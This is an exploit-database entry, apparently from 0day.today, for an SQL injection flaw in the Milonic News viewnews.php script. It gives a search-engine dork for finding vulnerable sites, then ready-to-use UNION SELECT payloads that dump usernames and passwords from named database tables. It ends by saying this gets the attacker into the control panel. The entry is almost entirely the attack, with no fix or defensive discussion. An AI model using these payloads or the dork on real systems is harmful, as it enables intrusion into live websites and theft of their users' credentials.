id: 10619
date: 01/06/2010
title: Milonic News (viewnews) SQL Injection Vulnerability
author: Err0R
cves: 

===================================================
Milonic News (viewnews) SQL Injection Vulnerability
===================================================

-----------------------------------------------------------------------------
 
# (+) dork : intext:"powered by Milonic" inurl:viewnews.php?id=
 
-----------------------------------------------------------------------------
 
# (+) Exploit : /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
 
Username :/viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14+from+renewabl_mhpcompanies.experts--
 
Passoword: /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14+from+renewabl_mhpwebsite.users--
 
you come .. control panel
-----------------------------------------------------------------------------



#  0day.today [2023-03-23]  #